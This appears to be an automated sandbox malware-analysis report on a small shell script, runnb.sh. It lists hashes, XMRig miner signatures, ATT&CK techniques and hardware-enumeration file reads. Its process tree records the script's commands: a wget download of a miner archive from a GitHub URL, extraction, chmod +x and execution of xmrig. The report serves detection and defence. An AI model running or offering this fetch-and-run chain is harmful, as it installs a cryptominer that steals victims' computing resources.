Analysis
-
max time kernel
1799s -
max time network
1800s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
16-10-2024 23:43
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240522.1-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runnb.sh
-
Size
160B
-
MD5
87ea8773efcca67a4f2ce3e1ba1d1ff8
-
SHA1
0770e97785f007f7a3bc9d7e35a72b16895c366d
-
SHA256
765a3183613b556d32d8775fc21410c61d1565a372c27ed54193d4808b5cdb01
-
SHA512
df69c7a84df081850f4a1f72d78f65ddf61074fd4af7f989458cdc4273b5a64eeccb6864391ca780875e7b754834bbcbb17d550c4c9514101a8d3f45470ac514
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule /tmp/xmrig-6.22.0/xmrig family_xmrig /tmp/xmrig-6.22.0/xmrig xmrig -
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 1448 chmod -
Executes dropped EXE 1 IoCs
Processes:
xmrigioc pid process /tmp/xmrig-6.22.0/xmrig 1449 xmrig -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
Processes:
xmrigdescription ioc process File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/product_name xmrig File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrig -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com -
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
Processes:
xmrigdescription ioc process File opened for reading /sys/devices/virtual/dmi/id/chassis_type xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_version xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrig File opened for reading /sys/devices/virtual/dmi/id/board_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/board_version xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/bios_date xmrig File opened for reading /sys/devices/virtual/dmi/id/board_name xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/product_uuid xmrig File opened for reading /sys/devices/virtual/dmi/id/product_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmrig File opened for reading /sys/devices/virtual/dmi/id/bios_version xmrig File opened for reading /sys/devices/virtual/dmi/id/product_version xmrig -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
xmrigdescription ioc process File opened for reading /proc/cpuinfo xmrig -
Reads CPU attributes 1 TTPs 45 IoCs
Processes:
xmrigdescription ioc process File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/package_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition xmrig File opened for reading /sys/devices/system/cpu/possible xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/online xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id xmrig -
Enumerates kernel/hardware configuration 1 TTPs 25 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
xmrigdescription ioc process File opened for reading /sys/devices/system/node/node0/access0/initiators xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency xmrig File opened for reading /sys/firmware/dmi/tables/smbios_entry_point xmrig File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus xmrig File opened for reading /sys/kernel/mm/hugepages xmrig File opened for reading /sys/devices/system/node/online xmrig File opened for reading /sys/devices/system/node/node0/meminfo xmrig File opened for reading /sys/devices/system/node/node0/hugepages xmrig File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems xmrig File opened for reading /sys/devices/cpu_core/cpus xmrig File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth xmrig File opened for reading /sys/firmware/dmi/tables/DMI xmrig File opened for reading /sys/bus/soc/devices xmrig File opened for reading /sys/fs/cgroup/unified/cgroup.controllers xmrig File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages xmrig File opened for reading /sys/bus/dax/devices xmrig File opened for reading /sys/devices/system/node/node0/access1/initiators xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency xmrig File opened for reading /sys/devices/virtual/dmi/id xmrig File opened for reading /sys/devices/system/cpu xmrig File opened for reading /sys/devices/cpu_atom/cpus xmrig File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages xmrig File opened for reading /sys/devices/system/node/node0/cpumap xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth xmrig -
Processes:
xmrigtardescription ioc process File opened for reading /proc/self/cpuset xmrig File opened for reading /proc/meminfo xmrig File opened for reading /proc/driver/nvidia/gpus xmrig File opened for reading /proc/version_signature xmrig File opened for reading /proc/sys/vm/nr_hugepages xmrig File opened for reading /proc/filesystems tar File opened for reading /proc/cmdline xmrig File opened for reading /proc/mounts xmrig -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgettarxmrigdescription ioc process File opened for modification /tmp/xmrigtar.tar.gz wget File opened for modification /tmp/xmrig-6.22.0/SHA256SUMS tar File opened for modification /tmp/xmrig-6.22.0/config.json tar File opened for modification /tmp/xmrig-6.22.0/xmrig tar File opened for modification /tmp/xmrig-6.22.0/config.json xmrig
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:1399
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵
- Writes file to tmp directory
PID:1400 -
/usr/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1446 -
/usr/local/sbin/gzipgzip -d3⤵PID:1447
-
/usr/local/bin/gzipgzip -d3⤵PID:1447
-
/usr/sbin/gzipgzip -d3⤵PID:1447
-
/usr/bin/gzipgzip -d3⤵PID:1447
-
/usr/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:1448 -
/tmp/xmrig-6.22.0/xmrig./xmrig2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1449
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD57e22fe2eca557c17c51d4310de1b9a44
SHA1cc391c722e872683c563618378587eafbc898018
SHA25651927e7c28c1886a85064eed52a18c3e693e8e3d7dbf9f174f0980c31fc4abeb
SHA5123b827035380ce4f892075090c0b7f6e10b385252550cb78d2cb74d7e92d7cc5a28589ab207df316d03fe423372ff750560d8bbddd1eb5032cd281bf1b4bcc40c
-
Filesize
150B
MD519f1bb08cf8997837b1f738b76ca97e9
SHA1c497499ad539d6ef580c6c932a2633fe820abded
SHA25699ca11102d0994a98a76722b325f3215b30d3b3df3d722a2baebf6f9944566fa
SHA512fbb742f0fa67720e798b493a5e5ba5e72cbdde3c0ea55cfc0704f93ab97c586434a3e029f6e1e3ed655da997649aa8e9caf352018b87457755f75ca1bfe50230
-
Filesize
919B
MD50a9b0011891eae4086d16c3364e772ff
SHA198fe8a7b5b6b0c0aa7635e4e388c67c863772b69
SHA2561aa77bd6697d36e345cd7c0769613e9798106b0fed206d7f766e846b63aa10fd
SHA5129e1791e92d71b539aac8f944a3db65708ebfca102f16e3e7af429aaea1446be781c4ec5cb740a163dbc11a3bdacfed36d21262e05fcf29d896beb06ce0d59554
-
Filesize
1KB
MD51879742a3f028a8e227f3b6b51756269
SHA120365c0cf35e787f525baede3646cfdfe6001cba
SHA2564042908287a7c60eb515d2c180a03d25156b4001af6cba1ad823461cc86751c5
SHA512e7d918532dd029a53b803df0df2e4e61416e18b58ffabe18b542cd30b111f266e98d73aad8ffe62a79af50e4f21d7e19415ee03ff104eb36aaad2cf1903e9731
-
Filesize
7.9MB
MD551f989c19819a0a0625c251df6affe95
SHA13b27c895b6f9665f9287510207bfcdcb7fe6e059
SHA256fd11982f252c060a1372e81d5be57589647052b56281a5c54975ca22164f7726
SHA512ec8ce7d1960f9ae564d5654a35e2ad108ed900f3f56b38dfe4601be0db49c1a3cd9c643307b72c2bfc0c157d2640a62343cd7377f68d29327104e0e78b4bdfbd
-
Filesize
3.4MB
MD5ccdb2d76041e107dff38f962d65b3d4b
SHA1e9360c43398f3725b0a3eb87e2448ac416d96be3
SHA25611d52ee20c865f6b0b7787bfe7a06d7ce0d865e041552365b9a026a0d24cc18f
SHA512f6b090c698cb1092bf10010bbe00fed0388e7117b8397cf3113a23271bb514d0d03b559de721896994b472f26f9e3aeeddc2877d71bcc7830313e97d2171033d